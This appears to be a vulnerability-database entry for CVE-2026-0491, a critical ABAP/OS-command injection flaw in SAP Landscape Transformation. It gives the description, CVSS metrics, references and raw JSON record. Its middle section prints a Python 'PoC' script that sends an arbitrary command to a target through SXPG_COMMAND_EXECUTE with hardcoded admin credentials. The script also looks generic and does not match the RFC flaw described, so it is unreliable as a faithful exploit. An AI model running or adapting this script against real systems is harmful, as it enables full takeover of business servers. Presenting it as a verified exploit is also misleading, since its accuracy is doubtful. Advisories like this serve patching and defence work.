Security Vulnerability Report
CVE-2026-0491 CVSS 9.1 CRITICAL

Published: 2026-01-13 02:15:51
Last Modified: 2026-04-15 00:35:42

Description

SAP Landscape Transformation allows an attacker with admin privileges to exploit a vulnerability in the function module exposed via RFC. This flaw enables the injection of arbitrary ABAP code/OS commands into the system, bypassing essential authorization checks. This vulnerability effectively functions as a backdoor, creating the risk of full system compromise, undermining the confidentiality, integrity and availability of the system.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration (CPE) data available.

Affected product: SAP Landscape Transformation, all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
Python:

import requests
import sys

# CVE-2026-0491 PoC
# Target: SAP Landscape Transformation RFC Interface

def exploit_rce(target_url, command):
    headers = {
        'Content-Type': 'application/json',
        'Authorization': 'Basic YWRtaW46cGFzc3dvcmQ='  # admin:password
    }
    payload = {
        'method': 'SXPG_COMMAND_EXECUTE',
        'params': {
            'COMMANDNAME': command
        }
    }
    response = requests.post(target_url, json=payload, headers=headers, verify=False)
    return response.text

if __name__ == '__main__':
    if len(sys.argv) != 3:
        print('Usage: python cve-2026-0491.py <target_url> <command>')
        sys.exit(1)
    target = sys.argv[1]
    cmd = sys.argv[2]
    result = exploit_rce(target, cmd)
    print(result)

References

- https://me.sap.com/notes/3697979 (SAP Note 3697979, vendor advisory)
- https://url.sap/sapsecuritypatchday (SAP Security Patch Day)
Raw JSON Data

JSON:

{
  "cve": {
    "id": "CVE-2026-0491",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-13T02:15:50.743",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "SAP Landscape Transformation allows an attacker with admin privileges to exploit a vulnerability in the function module exposed via RFC. This flaw enables the injection of arbitrary ABAP code/OS commands into the system, bypassing essential authorization checks. This vulnerability effectively functions as a backdoor, creating the risk of full system compromise, undermining the confidentiality, integrity and availability of the system."
      },
      {
        "lang": "es",
        "value": "SAP Landscape Transformation permite a un atacante con privilegios de administrador explotar una vulnerabilidad en el módulo de función expuesto a través de RFC. Este fallo permite la inyección de código ABAP/comandos del sistema operativo arbitrarios en el sistema, eludiendo las comprobaciones de autorización esenciales. Esta vulnerabilidad funciona eficazmente como una puerta trasera, creando el riesgo de compromiso total del sistema, socavando la confidencialidad, integridad y disponibilidad del sistema."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-94"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://me.sap.com/notes/3697979",
        "source": "[email protected]"
      },
      {
        "url": "https://url.sap/sapsecuritypatchday",
        "source": "[email protected]"
      }
    ]
  }
}